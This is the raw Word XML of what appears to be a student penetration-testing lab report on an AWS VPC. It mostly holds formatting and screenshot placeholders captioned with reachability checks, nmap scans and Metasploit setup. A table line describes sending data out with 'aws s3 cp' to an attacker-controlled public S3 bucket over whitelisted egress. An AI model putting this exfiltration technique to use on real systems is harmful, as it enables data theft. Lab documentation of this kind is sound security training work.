            <w:r w:rsidR="00B736C5" w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B736C5" w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> s3 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B736C5" w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B736C5" w:rsidRPr="003C688D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B736C5">
              <w:t>command to a public attacker-controlled S3 bucket over the legitimate, whitelisted AWS egress.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51D6FC40" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3EA3A1" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B947201" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E696DD" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11365190" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE3BA68" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A73115C" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6DA75A" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B9F2A0" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209DB02E" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7C9632" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329AF2ED" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D66441D" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574FFA74" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32481FF7" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FF08D2" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A021BB5" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEDCA2A" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26719E2D" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCDF3FE" w14:textId="77777777" w:rsidR="0073770F" w:rsidRPr="00291023" w:rsidRDefault="0073770F" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC81002" w14:textId="00903FD6" w:rsidR="0073770F" w:rsidRDefault="00381E3D" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Toc215571136"/>
      <w:r w:rsidRPr="00381E3D">
        <w:t>Environment and Execution Documentatio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="0073770F">
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE6E29C" w14:textId="728705A6" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55122D6E" wp14:editId="7DBC6E10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>381000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4973516" cy="2802093"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2" name="Picture 2" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\1 Ping to metaspota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inkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\1 Ping to metaspotabl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73516" cy="28020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819FA5" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D62A20" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601AD568" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0079D113" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5674A8" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC6380E" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A08020C" w14:textId="05244FA8" w:rsidR="0073770F" w:rsidRDefault="00A55F7D" w:rsidP="0073770F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0073770F">
        <w:t>Reachability check to Kali to AWS-VPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E617362" w14:textId="039EE3F6" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="653D1608" wp14:editId="4F84EF7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>333375</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>110490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5084893" cy="2876550"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3" name="Picture 3" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\2. Scanning for AW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hinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\2. Scanning for AWS.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84893" cy="2876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5F8797" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE1B07B" w14:textId="650B7546" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033C25A5" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357CDEF1" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE98D60" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E17D6F" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147F38B5" w14:textId="5D10906F" w:rsidR="0073770F" w:rsidRDefault="00A55F7D" w:rsidP="0073770F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0073770F">
        <w:t>Scanning for AWS-VPC through NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3595D1FC" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAF26F5" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D766F7A" w14:textId="471CF1CE" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A1F2143" wp14:editId="428A0474">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>466725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-685800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4810125" cy="2705695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4" name="Picture 4" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Kali to db_nmap host up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hinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Kali to db_nmap host up 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10125" cy="2705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9F7982" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08053012" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A11CCB9" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E7B92A" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796D4382" w14:textId="1376626E" w:rsidR="0073770F" w:rsidRDefault="00A55F7D" w:rsidP="0073770F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0073770F">
        <w:t>checking .the host up or down seems that host is alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB73F92" w14:textId="48D5B04E" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E45127E" wp14:editId="36CA0878">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>371475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>68581</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4981125" cy="2800350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5" name="Picture 5" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\msfconso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hinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\msfconsole.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80357" cy="279991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A56F09" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A198D8" w14:textId="444FEA20" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A715184" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3850ED86" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B50CD7" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40470389" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBF7D2B" w14:textId="3FAAD4D3" w:rsidR="0073770F" w:rsidRPr="003E0B53" w:rsidRDefault="00A55F7D" w:rsidP="0073770F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0073770F">
        <w:t xml:space="preserve">Creating DB for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0073770F">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FB3B663" w14:textId="395BAE5A" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C68E927" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC55A4E" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612633B5" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119A8AA3" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390F5D7F" w14:textId="7343818B" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A9E1DEE" wp14:editId="1ED0C802">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>590550</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-533400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4486275" cy="2524125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="6" name="Picture 6" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\msfcons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hinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\msfconsole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86275" cy="2524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829087" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C5478F" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B572991" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E279D1" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB430C4" w14:textId="17B38BB4" w:rsidR="00337A00" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00337A00">
        <w:t xml:space="preserve">Starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00337A00">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D947264" w14:textId="19684691" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B97B249" wp14:editId="3E6C73B3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>361950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5076825" cy="2847340"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7" name="Picture 7" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Kali to db_nmap- Sca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ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Kali to db_nmap- Scan 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76825" cy="2847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F53049" w14:textId="200FCE41" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
